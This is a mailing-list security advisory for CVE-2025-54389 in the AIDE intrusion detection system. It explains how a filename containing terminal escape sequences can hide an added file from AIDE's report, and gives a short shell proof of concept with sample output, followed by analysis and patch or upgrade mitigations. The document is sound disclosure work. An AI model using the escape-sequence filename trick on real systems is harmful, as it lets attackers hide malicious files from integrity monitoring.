[Aide] CVE-2025-54389 - aide (<= 0.19.1): improper output neutralization (potential AIDE detection bypass)

Hannes von Haugwitz hannes at vonhaugwitz.com
Thu Aug 14 17:01:39 EEST 2025 

Summary
=======

Rajesh Pangare discovered an improper output neutralization vulnerability in
AIDE, an advanced intrusion detection system. An attacker can craft a malicious
filename by including terminal escape sequences to hide the addition or removal
of the file from the report and/or tamper with the log output. A local user
might exploit this to bypass the AIDE detection of malicious files.
Additionally the output of extended attribute key names and symbolic links
targets are also not properly neutralized.

Project
=======

AIDE (https://aide.github.io)

Affected versions
=================

AIDE <= 0.19.1

CVE ID
======

CVE-2025-54389

Proof of concept
================

    $ mkdir test
    $ touch test/$(echo -e 'malicious-file\033[1A')
    $ touch test/regular-testfile
    $ aide --config <(printf -- "database_in=file:/dev/null\nroot_prefix = ./test\n/ R") --check
    Start timestamp: 2025-08-10 07:23:25 +0000 (AIDE 0.19.1)
    AIDE found differences between database and filesystem!!
    Root prefix: ./test

    Summary:
      Total number of entries:      3
      Added entries:                3
      Removed entries:              0
      Changed entries:              0

    ---------------------------------------------------
    Added entries:
    ---------------------------------------------------

    d++++++++++++++++++: /
    f++++++++++++++++++: /regular-testfile

    ---------------------------------------------------
    The attributes of the (uncompressed) database(s):
    ---------------------------------------------------

    /dev/null
     SHA256    : 47DEQpj8HBSa+/TImW+5JCeuQeRkm5NM
                 pJWZG3hSuFU=
     SHA512    : z4PhNX7vuL3xVChQ1m2AB9Yg5AULVxXc
                 g/SpIdNs6c5H0NE8XYXysP+DGNKHfuwv
                 Y7kxvUdBeoGlODJ6+SfaPg==
     STRIBOG256: P1OaIT6XyALMIp1HTGqjKoJaNgsqkzqU
                 n9klII2c4bs=
     STRIBOG512: jpRdogmqhp8EVZKFKbyuRnnphzq3B7VT
                 FfVs65i+8Kc2L3FVKDVu6DzaXyqsTGrS
                 ujpxXBvNgcuOn5C/TBwaig==
     SHA512/256: xnK40e9W7Sirh8NiLFEUBpvdOte4+XN0
                 mNDAHs7wlno=
     SHA3-256  : p//G+L8e12ZRwUdWoGHWYvWA/03kO0n6
                 gtgKS4D4Q0o=
     SHA3-512  : pp9zzKI6msXItWfcGFp1bpfJghZP4lhZ
                 4NHcwUdcgKYVshI68fX5TBHj6UAsOsVY
                 9QAZnZW20+MBdYWGKB3NJg==


    End timestamp: 2025-08-10 07:23:25 +0000 (run time: 0m 0s)

The output correctly shows the addition of `regular-testfile` but misses the
addition of the malicious file.

This works because the terminal escape sequence moves the cursor one line up
before the new line character of the regular output moves the cursor back to
the beginning of the line containing the malicious file; the next added entry
then overwrites the line.

Please note that the number of added entries is unchanged in the report. For
this POC a user might notice the difference between the number of added entries
and the list of added entries shown in the report, but with a much higher number
of added files the deviation is likely overlooked.

Analysis
========

The vulnerability is caused by missing output neutralization before printing
the filename, symbolic link target or extended attribute key name to the report
and log output.

This allows a user to craft a filename, symbolic link target or extended
attribute key name including control characters to tamper with or overwrite
previous output.

Mitigation
==========

Upgrade to AIDE v0.19.2 [v0.19.2]

Alternatively apply one of the provided patches:

aide-0.19_cve-2025-54389_control_chars.patch for 0.19.1
aide-0.18_cve-2025-54389_control_chars.patch for 0.18.8 (backported for Debian Bookworm)
aide-0.17_cve-2025-54389_control_chars.patch for 0.17.4 (backported for Debian Bullseye)

If you cannot upgrade, the issue can be mitigated by configuring AIDE to write
the report output to a regular file (e.g. `report_url=file:/var/log/aide.log`)
or redirecting stdout to a regular file. Additionally consider redirecting the
log output written to `stderr` to a regular file. Mind to open the generated
files with a program that escapes terminal sequences correctly.

[v0.19.2] https://github.com/aide/aide/releases/tag/v0.19.2

Credit
======

The issue was reported by Rajesh Pangare.
-------------- next part --------------
A non-text attachment was scrubbed...
Name: aide-0.17_cve-2025-54389_control_chars.patch
Type: text/x-diff
Size: 15255 bytes
Desc: not available
URL: <http://www.ipi.fi/pipermail/aide/attachments/20250814/aece4108/attachment-0003.patch>
-------------- next part --------------
A non-text attachment was scrubbed...
Name: aide-0.18_cve-2025-54389_control_chars.patch
Type: text/x-diff
Size: 18647 bytes
Desc: not available
URL: <http://www.ipi.fi/pipermail/aide/attachments/20250814/aece4108/attachment-0004.patch>
-------------- next part --------------
A non-text attachment was scrubbed...
Name: aide-0.19_cve-2025-54389_control_chars.patch
Type: text/x-diff
Size: 18338 bytes
Desc: not available
URL: <http://www.ipi.fi/pipermail/aide/attachments/20250814/aece4108/attachment-0005.patch>
-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 659 bytes
Desc: not available
URL: <http://www.ipi.fi/pipermail/aide/attachments/20250814/aece4108/attachment-0001.sig>

More information about the Aide mailing list